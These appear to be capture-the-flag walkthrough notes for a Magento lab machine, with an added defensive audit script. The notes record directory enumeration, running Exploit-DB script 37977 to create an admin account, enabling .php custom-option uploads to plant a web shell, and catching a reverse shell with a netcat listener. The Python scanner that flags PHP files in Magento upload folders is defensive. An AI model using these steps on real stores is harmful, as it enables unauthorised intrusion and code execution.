2 :80
$ gobuster dir -u 10.10.10.140 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x php,html,txt
===============================================================
/index.php (Status: 200) [Size: 16097]
/media (Status: 301) [Size: 312] [--> http://10.10.10.140/media/]
/includes (Status: 301) [Size: 315] [--> http://10.10.10.140/includes/]
/lib (Status: 301) [Size: 310] [--> http://10.10.10.140/lib/]
/install.php (Status: 200) [Size: 44]
/app (Status: 301) [Size: 310] [--> http://10.10.10.140/app/]
/js (Status: 301) [Size: 309] [--> http://10.10.10.140/js/]
/api.php (Status: 200) [Size: 37]
/shell (Status: 301) [Size: 312] [--> http://10.10.10.140/shell/]
/skin (Status: 301) [Size: 311] [--> http://10.10.10.140/skin/]
/cron.php (Status: 200) [Size: 0]
/LICENSE.html (Status: 200) [Size: 10679]
/LICENSE.txt (Status: 200) [Size: 10410]
/var (Status: 301) [Size: 310] [--> http://10.10.10.140/var/]
/errors (Status: 301) [Size: 313] [--> http://10.10.10.140/errors/]
/mage (Status: 200) [Size: 1319]
$ searchsploit magento
----------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------ ---------------------------------
Magento eCommerce - Remote Code Execution | xml/webapps/37977.py
Update target to http://10.10.10.140/index.php
$ python 37977.py
WORKED
Check http://10.10.10.140/index.php/admin with creds kashz1:kashz1
Magento ver. 1.9.0.0
Tried using https://www.exploit-db.com/exploits/37811; did not work.
Catalog > Manage Products > Select a product > Edit > Custom Options > Add New Option
Input Type = File
Allowed File Extensions = .php
Save
Go to the product page, choose shell.php for the new file option and add the product to the cart; the file is written to the media directory.
http://10.10.10.140/media/custom_options/quote/<RANDOM-PATH>
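The upload path above is where a defender should look for the result of a misconfigured file option. The following audit script is an added example, not part of the original notes or of Magento; it assumes a Magento 1 docroot layout (media/custom_options/quote for cart uploads, media/custom_options/order for checked-out ones), a constructed sample tree instead of a real host, and a blocklist of script extensions chosen here for illustration. It flags both files with script extensions and files whose bytes start a PHP open tag regardless of extension.

```python
import os
import re
import tempfile

# Extensions a Magento "File" custom option should never accept; the write-up
# above shows the result of allowing ".php". The list itself is an assumption.
DANGEROUS_EXTENSIONS = {".php", ".phtml", ".php3", ".php5", ".phar", ".pht"}
PHP_OPEN_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def scan_custom_option_uploads(docroot):
    """Walk media/custom_options (quote/ holds cart uploads, order/ holds
    checked-out ones) and return sorted (relative_path, reason) findings."""
    base = os.path.join(docroot, "media", "custom_options")
    findings = []
    for dirpath, _dirs, files in os.walk(base):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, docroot)
            ext = os.path.splitext(name)[1].lower()
            if ext in DANGEROUS_EXTENSIONS:
                findings.append((rel, "script extension"))
                continue
            # Extension looks harmless: still inspect the first bytes, since a
            # renamed script only needs a handler misconfiguration to execute.
            with open(full, "rb") as fh:
                head = fh.read(4096)
            if PHP_OPEN_TAG.search(head):
                findings.append((rel, "php open tag in content"))
    return sorted(findings)


def build_sample_docroot():
    """Constructed sample tree (not from any real host) for a stand-alone run."""
    root = tempfile.mkdtemp(prefix="magento_")
    quote = os.path.join(root, "media", "custom_options", "quote", "a", "b")
    os.makedirs(quote)
    samples = {
        "shell.php": b"<?php echo 'uploaded'; ?>",  # flagged by extension
        "notes.txt": b"<?php echo 'hidden'; ?>",    # flagged by content
        "photo.jpg": b"\xff\xd8\xff\xe0JFIF",        # benign
    }
    for name, data in samples.items():
        with open(os.path.join(quote, name), "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    for path, reason in scan_custom_option_uploads(build_sample_docroot()):
        print(f"{reason}: {path}")
```

Run it against the real docroot on a schedule, and pair it with the admin-side check that no custom option lists a script extension under Allowed File Extensions.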
$ rlwrap nc -lvnp 9000
listening on [any] 9000 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.140] 57270
SOCKET: Shell has connected! PID: 1969
whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)